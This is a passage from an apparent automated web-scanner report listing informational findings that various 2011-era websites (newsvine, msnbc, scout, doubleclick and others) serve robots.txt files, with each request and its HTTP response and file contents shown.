P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=d541015d8baaea3bf7c1b5a91eb2bafb; expires=Sat, 25-Jan-2031 02:04:24 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:04:24 GMT
Content-Length: 252
Keep-Alive: timeout=3, max=995
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://alex-j
...[SNIP]...

29.5. http://amch.questionmarket.com/adsc/d852149/4/864449/randm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d852149/4/864449/randm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:39:53 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "200515ce-1a-f999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=120, max=596
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

29.6. http://articles.redacted/news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://articles.redacted
Path:	/news/news.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: articles.moneycentral.msn.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sun, 30 Jan 2011 02:05:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA45
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "77b55e7d26fdca1:ddd"
Last-Modified: Wed, 26 May 2010 22:55:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 921

User-Agent: *
Disallow: /*ocid=
Disallow: /charts/
Disallow: /money.search?q=
Disallow: /*.axd$
Disallow: /expired.htm
Disallow: /*voteshowresults=
Disallow: /*page=all
Disallow: /*page=0
Disallow: /*
...[SNIP]...

29.7. http://athima-chansanchai.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: athima-chansanchai.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=091a34afcf54cab9e8f12483071fe6ba; expires=Sat, 25-Jan-2031 02:04:33 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:04:33 GMT
Content-Length: 258
Keep-Alive: timeout=3, max=988
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://athima
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: atl.whitepages.com

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:28 GMT
X-DirectServer: whitepg_DS0
Content-Type: text/plain
Content-Length: 54
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

# Disallow crawling of site
User-agent: *
Disallow: /

29.9. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.rad.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 01:07:36 GMT
Accept-Ranges: bytes
ETag: "03c8977b9cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:40:48 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /

29.10. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 31 Jan 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

29.11. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 03:38:56 GMT
ETag: "1ae601-1a-f2349400"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /

29.12. http://bassistance.de/jquery-plugins/jquery-plugin-validation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bassistance.de
Path:	/jquery-plugins/jquery-plugin-validation/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bassistance.de

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.13. http://beta-ads.ace.advertising.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://beta-ads.ace.advertising.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beta-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:06:03 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 30 Jan 2011 02:06:03 GMT
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

User-agent: *
Disallow: /

29.14. http://blog.deconcept.com/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.deconcept.com
Path:	/swfobject/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.deconcept.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache
Last-Modified: Sun, 15 Jun 2008 07:52:21 GMT
ETag: "64a2e08-a2-44fafca6f3740"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt file for deconcept.com and blog.deconcept.com

# general crawlers

User-agent: *
Disallow: /dl
Disallow: /awstats

User-agent: duggmirror
Disallow: /

29.15. http://blogs.discovermagazine.com/badastronomy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.discovermagazine.com
Path:	/badastronomy/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.discovermagazine.com

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
X-Pingback: http://blogs.discovermagazine.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Length: 30
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

29.16. http://blogs.nature.com/news/thegreatbeyond/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.nature.com
Path:	/news/thegreatbeyond/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.nature.com

Response

29.17. http://bodyodd.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bodyodd.msnbc.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bodyodd.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 248
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 02:11:09 GMT
Date: Sun, 30 Jan 2011 02:06:09 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://bodyod
...[SNIP]...

29.18. http://boyle.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: boyle.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=ea88020da6ea5ee0d991195908bb91d2; expires=Sat, 25-Jan-2031 02:05:04 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:05:04 GMT
Content-Length: 245
Keep-Alive: timeout=3, max=974
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://boyle.
...[SNIP]...

29.19. http://calendar.live.com/calendar/calendar.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://calendar.live.com
Path:	/calendar/calendar.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: calendar.live.com

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 23:54:54 GMT
Accept-Ranges: bytes
ETag: "0dbc51bb4b2cb1:7a69"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
xxn: 29
Date: Sun, 30 Jan 2011 02:06:11 GMT
Connection: close

User-agent: *
Disallow:/calendar/private/

29.20. http://careers.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://careers.redacted
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: careers.redacted

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sun, 30 Jan 2011 02:06:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "0b2a2b9c329cb1:ddd"
Last-Modified: Thu, 22 Jul 2010 17:31:32 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 464

User-Agent: *
Disallow: /*pgnew=
Disallow: /*_p=
Disallow: /*ucpg=
Disallow: /?f=
Disallow: /?lc=
Disallow: /*&=&
Disallow: /*wa=wsignin1.0
Disallow: /*page=0
Disallow: /*page=&
Disallow: /*login.asp
...[SNIP]...

29.21. http://cartoonblog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cartoonblog.msnbc.redacted
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cartoonblog.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 252
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 02:11:16 GMT
Date: Sun, 30 Jan 2011 02:06:16 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://cartoo
...[SNIP]...

29.22. http://clients1.google.com/complete/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clients1.google.com
Path:	/complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Sat, 29 Jan 2011 23:14:01 GMT
Expires: Sat, 29 Jan 2011 23:14:01 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.23. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 30 Jan 2011 01:42:34 GMT
Server: Cookie Matcher
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

29.24. http://college.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://college.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: college.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://college.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:56 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.25. http://collegebasketball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://collegebasketball.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: collegebasketball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://collegebasketball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.26. http://collegefootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://collegefootball.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: collegefootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://collegefootball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:58 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.27. http://curmudgeons.blogspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://curmudgeons.blogspot.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: curmudgeons.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Sun, 30 Jan 2011 02:07:57 GMT
Date: Sun, 30 Jan 2011 02:07:57 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Sat, 29 Jan 2011 22:50:38 GMT
ETag: "3769e370-63c6-4a98-8a60-8feefd5f390b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search

Sitemap: http://curmudgeons.blogspot.com/feeds/posts/default?orderby=updated

29.28. http://dateline.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dateline.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dateline.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:04 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.29. http://developer.yahoo.net/yui/license.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.yahoo.net
Path:	/yui/license.txt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: developer.yahoo.net

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 27 Sep 2010 22:34:40 GMT
Accept-Ranges: bytes
Content-Length: 29
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /mt/

29.30. http://digitalnature.ro/projects/fusion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digitalnature.ro
Path:	/projects/fusion

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digitalnature.ro

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://digitalnature.ro/xmlrpc.php
Set-Cookie: wassup=MDBlY2ZhZTI0YWU0OGRjZTdmNzUwOTk5NDM4YmFlZGI6OjEyOTYzNTU5OTM6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:13 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://digitalnature.ro/sitemap.xml.gz

29.31. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.macromedia.com
Path:	/pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Unix)
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "1c91-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 30 Jan 2011 02:08:11 GMT
Connection: close

User-agent: *
Disallow: /

29.32. http://earthsky.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://earthsky.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: earthsky.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sun, 30 Jan 2011 02:08:15 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-nollkmcj=17DA8352D5F6E5FDCD81AE17073E9E05; path=/
Last-Modified: Mon, 07 Jun 2010 16:58:46 GMT
Content-Length: 29

User-agent: *
Disallow: /wp-

29.33. http://ec.redcated/ds/UXULASONYSEL/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ec.redcated
Path:	/ds/UXULASONYSEL/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ec.redcated

Response

HTTP/1.0 200 OK
Expires: Sun, 06 Feb 2011 02:08:12 GMT
Date: Sun, 30 Jan 2011 02:08:12 GMT
Content-Type: text/plain
Content-Length: 68
Allow: GET
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

29.34. http://eurekalert.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://eurekalert.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: eurekalert.org

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:15 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Last-Modified: Tue, 19 Oct 2010 16:23:28 GMT
ETag: "16a04-d8-4cbdc600"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

#
# robots.txt for http://www.eurekalert.org
#

# To prevent search engines from looking for docs in
# the "/releases" directory, which is no longer used
User-agent: *
Disallow: /releases
Disallow: /e
...[SNIP]...

29.35. http://hardball.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hardball.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hardball.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:22 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.36. http://helenaspopkin.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: helenaspopkin.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=11818041970a8df9502fdbab72b2013b; expires=Sat, 25-Jan-2031 02:07:19 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:07:19 GMT
Content-Length: 253
Keep-Alive: timeout=3, max=974
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://helena
...[SNIP]...

29.37. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ingame.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 249
Content-Type: text/plain
Cache-Control: max-age=296
Expires: Sun, 30 Jan 2011 02:13:25 GMT
Date: Sun, 30 Jan 2011 02:08:29 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://inga
...[SNIP]...

29.38. http://jcfootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jcfootball.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jcfootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://jcfootball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.39. http://jp.video.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jp.video.redacted
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jp.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 116
Content-Type: text/plain
Last-Modified: Sun, 22 Jun 2008 10:45:44 GMT
Accept-Ranges: bytes
ETag: "0bc261f55d4c81:1713"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

User-agent: msnbot-media
Disallow:

User-agent: *
Disallow: /StreamingUrl.aspx?*
Disallow: /StreamingUrl.aspx

29.40. http://jquery.org/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/license

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jquery.org

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:09:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://jquery.org/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.41. http://latino.video.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latino.video.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: latino.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 116
Content-Type: text/plain
Last-Modified: Sun, 22 Jun 2008 10:45:44 GMT
Accept-Ranges: bytes
ETag: "0bc261f55d4c81:1713"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:11 GMT
Connection: close

User-agent: msnbot-media
Disallow:

User-agent: *
Disallow: /StreamingUrl.aspx?*
Disallow: /StreamingUrl.aspx

29.42. http://live.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

